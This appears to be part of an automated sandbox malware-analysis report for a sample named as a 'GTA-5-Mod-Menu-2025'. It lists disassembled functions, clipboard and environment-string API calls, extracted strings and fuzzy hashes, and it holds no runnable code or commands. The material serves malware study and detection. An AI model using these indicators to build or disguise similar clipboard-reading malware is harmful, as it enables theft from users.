OpenClipboard.USER32 ref: 00432294
GetClipboardData.USER32 ref: 004322AF
GlobalLock.KERNEL32 ref: 004322C8
GetWindowLongW.USER32 ref: 00432327
GlobalUnlock.KERNEL32 ref: 00432407
CloseClipboard.USER32 ref: 00432414

Strings

R, xrefs: 0043236F

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: R
API String ID: 2832541153-1466425173
Opcode ID: b0b5be2cd8172e043d23e39cb18898a930aaa770be71c0ab7e943b9c29670a71
Instruction ID: 31c7b9fb774cc7d891dc00418efd392389040aff0cc4cfa9da3350d23de6a26b
Opcode Fuzzy Hash: b0b5be2cd8172e043d23e39cb18898a930aaa770be71c0ab7e943b9c29670a71
Instruction Fuzzy Hash: 5641B27150C7828EC304AF7C958831FBEE09B96324F044B3DE5E5963D2D6B88585C797

Function 00416913 Relevance: 11.6, Strings: 9, Instructions: 377COMMON

Download Yara Rule

Strings

5^;\, xrefs: 00416A20
\N=L, xrefs: 004169FE
$B7@, xrefs: 00416A16
@6D4, xrefs: 004169F0
u.p,, xrefs: 004169C6
G2W0, xrefs: 004169F7
K>B<, xrefs: 004169E2
mA, xrefs: 00416DC3
4J9H, xrefs: 00416A05

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: $B7@$4J9H$5^;\$@6D4$G2W0$K>B<$\N=L$u.p,$mA
API String ID: 0-1267596520
Opcode ID: e7b8207d99717d6c5ac4bb3c42a59a657c0280431c1527ba2b65d47d9cf6c2fd
Instruction ID: 9630a44cccf1b5eda50ffd861a1fee61a0e6d3e610a3fce5884dad38d24e0746
Opcode Fuzzy Hash: e7b8207d99717d6c5ac4bb3c42a59a657c0280431c1527ba2b65d47d9cf6c2fd
Instruction Fuzzy Hash: B4D1DFB56017018FC724CF29C491B62BBF2FF85310F1A86ADC4968B765E778E841CB84

Function 0041D9B0 Relevance: 9.8, Strings: 7, Instructions: 1060COMMON

Download Yara Rule

Strings

BRLL, xrefs: 0041E124
Y@I9, xrefs: 0041DCF0
QVVP, xrefs: 0041E11C
!', xrefs: 0041E52F
C]KN, xrefs: 0041DCE8
~, xrefs: 0041E12C
>, xrefs: 0041E536

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: !'$>$BRLL$C]KN$QVVP$Y@I9$~
API String ID: 0-4030735238
Opcode ID: 09bedd2aba70a78016ec3cad4a2f0163782b3a6e45fe0f02d64a60f956e88df1
Instruction ID: 4eaaf35f588cb58bf6b7023ee20699753de47eb06926e62c43decc8dc3330243
Opcode Fuzzy Hash: 09bedd2aba70a78016ec3cad4a2f0163782b3a6e45fe0f02d64a60f956e88df1
Instruction Fuzzy Hash: 2C729E7450C3518FC725CF25C8507AFBBE1AF95304F088A6EE8E54B382D7399946CB96

Function 00409010 Relevance: 9.0, Strings: 7, Instructions: 258COMMON

Download Yara Rule

Strings

ZASY, xrefs: 004090B7
OMQL, xrefs: 004090C7
v, xrefs: 00409138
ecv, xrefs: 0040903D
ecv, xrefs: 0040923E
hlzn, xrefs: 004090E7
iukl, xrefs: 004090CF

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: OMQL$ZASY$ecv$ecv$hlzn$iukl$v
API String ID: 0-2048791439
Opcode ID: be1a5fd6c10b869317c23b45c390f2cd4d9aed9c8e1051da07d9a4a81fcef876
Instruction ID: be96c4ddf38c931e840ef98c6541bcac57307c5dac2786bf8bb90604c1667e7f
Opcode Fuzzy Hash: be1a5fd6c10b869317c23b45c390f2cd4d9aed9c8e1051da07d9a4a81fcef876
Instruction Fuzzy Hash: 4561C43164D3C29AD3118F7584A076BFFE09FA3700F0859AEE4D45B382D3398919D76A

Function 0042A870 Relevance: 9.0, Strings: 7, Instructions: 246COMMON

Download Yara Rule

Strings

694?, xrefs: 0042A9F1
-/&1, xrefs: 0042A9A4
, xrefs: 0042A92A
Gb03, xrefs: 0042A9BA
V,_!, xrefs: 0042A978
W8, xrefs: 0042A9E6
m, xrefs: 0042AA8A

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: $-/&1$694?$Gb03$V,_!$W8$m
API String ID: 0-3075149852
Opcode ID: 3eefd7f81ed0479454b0dbe7166a133b3337e97782b94e9cbe5ed6d739c9a33a
Instruction ID: 07534d52fd8654af7c634005e638618e25429ba14b9db59fe1cdb4dfdfb4e919
Opcode Fuzzy Hash: 3eefd7f81ed0479454b0dbe7166a133b3337e97782b94e9cbe5ed6d739c9a33a
Instruction Fuzzy Hash: 0D81AAB420D3918BD3358F2594A03EBBFE1AF96304F58899DE8C95B341D7398406CB5B

Function 00418DC3 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 386COMMON

Download Yara Rule

Strings

u6L|, xrefs: 004190EA
q6L|, xrefs: 004190B3

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: q6L|$u6L|
API String ID: 0-4026611235
Opcode ID: 18d0c5db816874cb61c2183cf5bfddce40293194255e5619b09eec3c00f6d0f9
Instruction ID: d0c996030e5aab2461a3f99bd8c74c650034a66cfaae767ccd945719e2cbae30
Opcode Fuzzy Hash: 18d0c5db816874cb61c2183cf5bfddce40293194255e5619b09eec3c00f6d0f9
Instruction Fuzzy Hash: 0DE10075600B01CFC724CF29C8916A3B7F2FF99310B198AADD4968B7A5D739E842CB44

Function 0043BB80 Relevance: 5.7, Strings: 4, Instructions: 666COMMON

Download Yara Rule

Strings

, xrefs: 0043BEE4, 0043BFAF, 0043BEBD, 0043BD24
f, xrefs: 0043BD5C
, xrefs: 0043BBC3, 0043BC13
=::8, xrefs: 0043BCC5

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID: =::8$f$$
API String ID: 2994545307-2077278400
Opcode ID: 5b6f0666ccfc26040dab8f432d891a0c18c09ccf58fd79ce2bc93a4fe8ae563e
Instruction ID: 1bd3f32885875e6d0890e585b4ef16a533047c91f684153c2df5fe5c59a5d402
Opcode Fuzzy Hash: 5b6f0666ccfc26040dab8f432d891a0c18c09ccf58fd79ce2bc93a4fe8ae563e
Instruction Fuzzy Hash: 3D222636A083458FD314CF28C880B6BB7E2EBC9314F189A2EE59597391D774ED05CB86

Function 00428F1F Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429001
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429195

Strings

}{, xrefs: 004290C5

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: }{
API String ID: 237503144-1817783701
Opcode ID: 16afa918c6882dfd4e4bc712b4babfffb69efea80506a4196365dc12001641ed
Instruction ID: f0ec042841f28d150a08b660374878167d466067f4985ddf90ac37596e8225fb
Opcode Fuzzy Hash: 16afa918c6882dfd4e4bc712b4babfffb69efea80506a4196365dc12001641ed
Instruction Fuzzy Hash: DA7189B1A403208FD3158F9AC942BAABFB5FB55310F19926DD815AF792C778CC428BC5

Function 00414F27 Relevance: 5.4, Strings: 4, Instructions: 387COMMON

Download Yara Rule

Strings

SA, xrefs: 0041505B
YZ, xrefs: 0041533A
ZR, xrefs: 00415341
AL, xrefs: 00415333

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: AL$YZ$ZR$SA
API String ID: 0-278399133
Opcode ID: 17c7183413d10041a0133c4e25f34aea4590fa52c6808d476237fb28ecf8cd9d
Instruction ID: a58a268fd87ddbe2b0e6997e3312ee0df0e36ab0bdb19f87c0a900b7fd06fb42
Opcode Fuzzy Hash: 17c7183413d10041a0133c4e25f34aea4590fa52c6808d476237fb28ecf8cd9d
Instruction Fuzzy Hash: FBD13FB4C00B00ABD720AF39C9477977EB4EB05350F50465EE8EA9B385E33564598BE7

Function 00423C80 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423D83

Strings

W, xrefs: 00423CB6
{x, xrefs: 00423CFC

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: W${x
API String ID: 237503144-3671023368
Opcode ID: 786606c3dc092902752c1c498574fd258e7c035387cc116f078ff6fe03c28d13
Instruction ID: a5fd1ba5d2db3268e1939a6825d171a771d0ca1e0e6d89280d1a63628780965b
Opcode Fuzzy Hash: 786606c3dc092902752c1c498574fd258e7c035387cc116f078ff6fe03c28d13
Instruction Fuzzy Hash: 5D4113B2A103108BDB14CF66C9D276A3BB2FB45300F5981A8DD569F38AD779C942CBD4

Function 00438950 Relevance: 4.3, Strings: 3, Instructions: 522COMMON

Download Yara Rule

Strings

, xrefs: 00438E80, 00438B18
, xrefs: 00438980, 004389DA, 00438A2A, 00438A2E
, xrefs: 00438B30, 00438B89

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: $$
API String ID: 0-32506980
Opcode ID: e8d1a0db1043de54b1b2344a254148f1aea362d8b84ce46076752b25d96364ad
Instruction ID: 970216d22e0e57e9067202e9ed210ba15d8fc61f54c70a19d2ee6af1056012c4
Opcode Fuzzy Hash: e8d1a0db1043de54b1b2344a254148f1aea362d8b84ce46076752b25d96364ad
Instruction Fuzzy Hash: AED17836B043009BD3149B25CC8172BF7A7EBD9314F29A52EF58597356CB78AC028B99

Function 0041A7C6 Relevance: 4.2, Strings: 3, Instructions: 482COMMON

Download Yara Rule

Strings

(vt, xrefs: 0041AB67
~|, xrefs: 0041AB75
;z{x, xrefs: 0041AB7C

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: (vt$;z{x$~|
API String ID: 0-2255775517
Opcode ID: e1e35ac360842a9712e3830397a42e861688cc94bc8176bf4c61fe91c6be5d9c
Instruction ID: a2912b0b9e7d6d84f2484074f0585d3c7045b63e4963a885df20c5de1ca981e2
Opcode Fuzzy Hash: e1e35ac360842a9712e3830397a42e861688cc94bc8176bf4c61fe91c6be5d9c
Instruction Fuzzy Hash: 5BE1D0B4901B019FC321DF29C982663BFF1FF46310B148A5ED8D64BB55D334A866CB96

Function 00409690 Relevance: 4.2, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

v, xrefs: 00409868
ACBBB19E4921B4981E3DEB35470B39C1, xrefs: 0040976A
q, xrefs: 00409714

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: ACBBB19E4921B4981E3DEB35470B39C1$q$v
API String ID: 0-276898990
Opcode ID: b26a21a5819527a5cd816fafe1bec3b5ca4d7f9f0b344b900f9fd73f457edd91
Instruction ID: 2e467706338f15d38ca88fcf9c1edf598b493576a309fafa7b1392fefc59b62b
Opcode Fuzzy Hash: b26a21a5819527a5cd816fafe1bec3b5ca4d7f9f0b344b900f9fd73f457edd91
Instruction Fuzzy Hash: 1CD14772A183408BD314CF65C85176BBBE2EFD1304F14892EE4D19B392DB79D90ACB96

Function 0041B22A Relevance: 3.9, Strings: 3, Instructions: 130COMMON

Download Yara Rule

Strings

IM9F, xrefs: 0041B301
IJQ^, xrefs: 0041B316
GKH, xrefs: 0041B308

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: GKH$IJQ^$IM9F
API String ID: 0-2604729716
Opcode ID: fef0946c19b05084504d9099280d4db75fbd78642803dd6f2524cb5281737129
Instruction ID: 70e31edc7e30b7324b13001e2a5ca1b92760cc9fc6ead0f2dcce76324a3e6361
Opcode Fuzzy Hash: fef0946c19b05084504d9099280d4db75fbd78642803dd6f2524cb5281737129
Instruction Fuzzy Hash: 88416974600B419FE7258F35CC516A2BBA2FF97310F188698D0929F795C379E852CB88

Function 0040C252 Relevance: 3.8, Strings: 3, Instructions: 95COMMON

Download Yara Rule

Strings

nl, xrefs: 0040C292
zx, xrefs: 0040C27A
if, xrefs: 0040C2A2

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: if$nl$zx
API String ID: 0-3024435305
Opcode ID: d84fde7f7387599ff90c571b96294a49ca71e4647e3a725b582a4970e8aa4ec6
Instruction ID: 57124a0ec9cee98ef9313d1ddb0ef3435ffc12f42a5085038e2807d673d1cc0f
Opcode Fuzzy Hash: d84fde7f7387599ff90c571b96294a49ca71e4647e3a725b582a4970e8aa4ec6
Instruction Fuzzy Hash: D331CB7461D3528AC314DF58C46163BB7F2EFD6300F24892DE895AB395E7389A11CB4E

Function 00427F32 Relevance: 3.3, APIs: 2, Instructions: 253COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,A909AF22,00000009,00000000,00000000,D160D766), ref: 00427FEE
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042816E

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 2607c436665260f03eaf4a1c9a197b14ac76d6bef1e8c9fc12e883b964a0dcc7
Instruction ID: 17aaa8197d0553d2a673e825a4a1699ba9b46d490ee1a985ddd799fe4a462d88
Opcode Fuzzy Hash: 2607c436665260f03eaf4a1c9a197b14ac76d6bef1e8c9fc12e883b964a0dcc7
Instruction Fuzzy Hash: 677149B6E002105BEB18DF7CCC9276FBEB2EB85310F59817DE455AF385D93444028B91

Function 0041BCF0 Relevance: 3.1, Strings: 2, Instructions: 614COMMON

Download Yara Rule

Strings

IK, xrefs: 0041BF61
rs, xrefs: 0041C30C

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: rs$IK
API String ID: 0-2158699859
Opcode ID: 0fd47706580c19ce44ff133b0c38231982e90c846a16c7a35b26ee127f9f342d
Instruction ID: 009500b8cdb8213b80d51384f6b2a9c6e3cd8f992beaf1bc88bd3c63b19eb604
Opcode Fuzzy Hash: 0fd47706580c19ce44ff133b0c38231982e90c846a16c7a35b26ee127f9f342d
Instruction Fuzzy Hash: 381201B560C3009BD710DF29D8916ABBBF1EFD6314F08896DE4C58B342E638D945CB9A

Function 00424A08 Relevance: 3.1, Strings: 2, Instructions: 608COMMON

Download Yara Rule

Strings

xQB, xrefs: 004250C0
, xrefs: 00425025, 00425040

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: xQB$
API String ID: 0-1821618924
Opcode ID: 6e27779c4a9eb3f5d654bca9240d60fd7e6136f8739c8312731d15b7afcecc9e
Instruction ID: 917d7035d1355f7ed64dd103f410a3797ffe51cb3d352abc7ec5bcd03244f16c
Opcode Fuzzy Hash: 6e27779c4a9eb3f5d654bca9240d60fd7e6136f8739c8312731d15b7afcecc9e
Instruction Fuzzy Hash: 2B12F075E00222CFDB14CF68D8916AEF7B2FF8A310F6A4569C941AB351D735AC42CB94

Function 0042AFEA Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

(), xrefs: 0042B233
UZRk, xrefs: 0042B162

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: ()$UZRk
API String ID: 0-3133777487
Opcode ID: f553e5ec3553770c8f2cee49796cc0ffb552fa1e349475f8e08a655e073ebbd6
Instruction ID: 30318cc1521cf9abddd90c1628e95656b963a46a767071f44aef6809545d88c2
Opcode Fuzzy Hash: f553e5ec3553770c8f2cee49796cc0ffb552fa1e349475f8e08a655e073ebbd6
Instruction Fuzzy Hash: 0351117025C3809BD725CF34D8A53EBBBE1AFC6704F58886DD0D89B341CB39840A8B96

Function 0042786F Relevance: 2.6, Strings: 2, Instructions: 59COMMON

Download Yara Rule

Strings

KyB, xrefs: 00427945
X2g0, xrefs: 004278F0

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: KyB$X2g0
API String ID: 0-1002925558
Opcode ID: c5ac489e00a2ac72df77393b5453858d223e520e0a9a622bb9250be03b2c0532
Instruction ID: 7b23b1b79b845c0becc6db487958f2cfb21d9bfcb3c1090b9a6ac0bd44fbe49f
Opcode Fuzzy Hash: c5ac489e00a2ac72df77393b5453858d223e520e0a9a622bb9250be03b2c0532
Instruction Fuzzy Hash: FF0192B6B5C3208BD3158B19E89012BB3E2ABD9711F59492EE48567700C6749C428BCA

Function 00414280 Relevance: 2.0, Strings: 1, Instructions: 718COMMON

Download Yara Rule

Strings

, xrefs: 00414E7A

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 7b63a8034375d2af04073a564af0f4f7adeb6574e979dac0ff1343cc3febc3ea
Instruction ID: ec2d05f2e51b1c7129bc03da390dadb612b87f3dd0570e39a2f303230a220cdf
Opcode Fuzzy Hash: 7b63a8034375d2af04073a564af0f4f7adeb6574e979dac0ff1343cc3febc3ea
Instruction Fuzzy Hash: AC224776A143009BD714CF28EC527ABB3A2EFC6314F09453DE4C197291EB78A945CB9A

Function 004292F3 Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

, xrefs: 00429921, 0042987E

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 548becee1886b8c87e52cdb0e57f839d16df8a2bd10ba8e3f3db48f357a77596
Instruction ID: 9ea381fbacc83f0afa8e4b59733c97f7d57f13874a88d60c0308fa3474373214
Opcode Fuzzy Hash: 548becee1886b8c87e52cdb0e57f839d16df8a2bd10ba8e3f3db48f357a77596
Instruction Fuzzy Hash: 0F0237B5E04215CFDB058F68EC916AEBBB1FF0B310F1941A9E841AB391D7395D01CB99

Function 004219B0 Relevance: 1.7, Strings: 1, Instructions: 493COMMON

Download Yara Rule

Strings

, xrefs: 00421E25, 00421E56

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 19ee66d57beffd3cff7d3a33805b79e379e6887620b450d9281a454dc48cb3f8
Instruction ID: 325b2d32a275c1ced2308b6d38be9f416c4c37a5ba78286fb40102bc953f2477
Opcode Fuzzy Hash: 19ee66d57beffd3cff7d3a33805b79e379e6887620b450d9281a454dc48cb3f8
Instruction Fuzzy Hash: F5D13672B043208BD7148F25D89267BB3F1EFA1314F59952EE88697391E63CEC05879A

Function 00428630 Relevance: 1.7, Strings: 1, Instructions: 463COMMON

Download Yara Rule

Strings

, xrefs: 00428AAE

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 64b162ade176055f92942673c7cfe488de403285e55cd6a84a745beca88a09d7
Instruction ID: db3a2ff2810daf0e2f6c41afe4a12a4da796e990cfad47177b4aaa730c14d7ba
Opcode Fuzzy Hash: 64b162ade176055f92942673c7cfe488de403285e55cd6a84a745beca88a09d7
Instruction Fuzzy Hash: 9AE148B5E04265CFDB108F68DC916AFB7B1FF46314F18416EE452AB392DB38A801CB59

Function 00414804 Relevance: 1.7, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00414A20

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID: D]+\
API String ID: 2994545307-1174097187
Opcode ID: 244734e9967a5e56c90076f8537a2ab07a6bb37d36f90949d650e69cdb6aee1f
Instruction ID: 118c6c8d4040abb89e558249f621c867b47958a023dcf181e8174105492871de
Opcode Fuzzy Hash: 244734e9967a5e56c90076f8537a2ab07a6bb37d36f90949d650e69cdb6aee1f
Instruction Fuzzy Hash: ECA1497971A2009FD7089B29EC5177B73A2ABC6361F294A3DE0C1476A2DB349C818B5D

Function 0040DF82 Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

, xrefs: 0040E1CD, 0040E127, 0040E079, 0040DFDB

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-3019521637
Opcode ID: e9a50bde0507edb5b470add06843d72d314ba5a95f27c5511c0e9a30e5930726
Instruction ID: cb99ef0ffeac7bebb980e6094653c27070be9b80b4795396c95ae866cd1300ca
Opcode Fuzzy Hash: e9a50bde0507edb5b470add06843d72d314ba5a95f27c5511c0e9a30e5930726
Instruction Fuzzy Hash: ED5148397152104BD7288B2ADC9177B73E29BC9320F2C8D3DD482E77A5CA389C518B49

Function 00428BF0 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

qx, xrefs: 00428C71

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: qx
API String ID: 0-692295476
Opcode ID: fe89e3a02a11483ed6030c1b3b77a96d6762e4fc38c55a67123696f3cd43a987
Instruction ID: d4ebbf15c6dec44c84bcde361246c0b073cebca7473eaa8dec32d6046898dc33
Opcode Fuzzy Hash: fe89e3a02a11483ed6030c1b3b77a96d6762e4fc38c55a67123696f3cd43a987
Instruction Fuzzy Hash: 0A617875A027258BCB20CF65C8516BBB7B1FF56320F14864CD8966B3A5E738AC41CB98

Function 00438690 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

, xrefs: 004386F0, 00438748, 004387D0, 00438839

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

